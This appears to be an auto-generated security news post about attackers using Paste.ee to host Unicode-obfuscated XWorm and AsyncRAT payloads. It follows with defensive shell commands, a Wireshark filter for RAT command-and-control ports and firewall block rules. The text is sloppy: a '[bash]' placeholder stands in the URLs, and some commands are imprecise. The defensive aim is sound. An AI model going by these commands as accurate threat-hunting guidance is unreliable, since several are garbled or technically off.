Threat Actors Abuse Pasteee to Distribute XWorm and AsyncRAT Malware

By /

Listen to this Post

Featured Image
Researchers at Hunt Intelligence, Inc. discovered threat actors exploiting Paste.ee, a legitimate pastebin service, to distribute XWorm and AsyncRAT malware. The attackers used Unicode obfuscation to evade detection while leveraging Paste.ee’s free API to host malicious payloads.

Key Findings:

  • Paste.ee (https://paste.ee/) is a free text-sharing platform with 4.8M+ pastes.
  • Attackers hid malicious code using rare Unicode characters to bypass security scans.
  • Indicators of Compromise (IOCs) were shared for threat hunting.

You Should Know:

1. Detecting Malicious Paste.ee Links

Use Linux command-line tools to analyze suspicious pastes:

curl -s "https://paste.ee/p/[bash]" | grep -P "[\x80-\xFF]" | less

This checks for non-ASCII Unicode characters often used in obfuscation.

2. Extracting IOCs from Pastebin Sites

wget -qO- "https://paste.ee/r/[bash]" | grep -Eo '(http|https)://[^"]+' | sort -u

3. Analyzing AsyncRAT & XWorm Traffic

Use Wireshark filters to detect C2 communications:

tcp.port == 8080 || tcp.port == 4444 || http.user_agent contains "AsyncRAT"

4. Blocking Malicious Domains via Firewall

On Linux (iptables):

sudo iptables -A INPUT -s "malicious-ip" -j DROP

On Windows (PowerShell):

New-NetFirewallRule -DisplayName "Block XWorm C2" -Direction Outbound -Action Block -RemoteAddress "1.2.3.4"

5. Hunting for Unicode Obfuscation in Logs

journalctl -u nginx --no-pager | grep -P "[\x80-\xFF]"

What Undercode Say:

Pastebin services remain a major threat vector for malware distribution. Security teams should:
– Monitor paste sites for unusual Unicode patterns.
– Block known malicious IPs at the firewall level.
– Use YARA rules to detect obfuscated scripts.
– Train analysts in decoding uncommon text obfuscation techniques.

Expected Output:

  • List of malicious IPs/domains from Paste.ee pastes.
  • Detection of AsyncRAT/XWorm C2 traffic.
  • Blocked connections to malware distribution servers.

Prediction:

Attackers will increasingly abuse lesser-known pastebin sites for malware delivery, requiring automated IOC scraping and AI-powered anomaly detection in security tools.

Relevant URL:

IT/Security Reporter URL:

Reported By: Mthomasson Threat – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: